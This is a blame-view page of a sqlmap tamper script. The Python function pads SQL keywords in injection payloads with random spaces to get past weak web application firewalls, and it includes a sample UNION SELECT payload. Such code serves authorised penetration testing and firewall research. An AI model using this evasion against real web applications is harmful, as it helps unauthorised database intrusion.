SIGN IN SIGN UP
sqlmapproject / sqlmap UNCLAIMED

Automatic SQL injection and database takeover tool

0 0 0 Python
2019-05-08 12:47:52 +02:00
#!/usr/bin/env python
2011-06-09 12:14:14 +00:00
"""
2026-01-01 19:12:07 +01:00
Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
2017-10-11 14:50:46 +02:00
See the file 'LICENSE' for copying permission
2011-06-09 12:14:14 +00:00
"""
import random
import re
from lib.core.data import kb
2019-05-03 13:20:15 +02:00
from lib.core.datatype import OrderedSet
2019-06-04 14:44:06 +02:00
from lib.core.enums import PRIORITY
2011-06-09 12:14:14 +00:00
__priority__ = PRIORITY.NORMAL
def dependencies():
pass
2012-12-03 14:27:01 +01:00
def tamper(payload, **kwargs):
2011-06-09 12:14:14 +00:00
"""
2018-07-31 01:17:11 +02:00
Adds multiple spaces (' ') around SQL keywords
Notes:
* Useful to bypass very weak and bespoke web application firewalls
that has poorly written permissive regular expressions
2011-06-09 12:14:14 +00:00
Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
2019-05-03 13:20:15 +02:00
'1 UNION SELECT foobar'
2011-06-09 12:14:14 +00:00
"""
retVal = payload
if payload:
2019-05-03 13:20:15 +02:00
words = OrderedSet()
2011-06-09 12:14:14 +00:00
2018-02-08 16:49:16 +01:00
for match in re.finditer(r"\b[A-Za-z_]+\b", payload):
2011-06-09 12:14:14 +00:00
word = match.group()
if word.upper() in kb.keywords:
words.add(word)
for word in words:
2019-05-03 13:20:15 +02:00
retVal = re.sub(r"(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randint(1, 4), word, ' ' * random.randint(1, 4)), retVal)
retVal = re.sub(r"(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randint(1, 4), word), retVal)
2011-06-09 12:14:14 +00:00
return retVal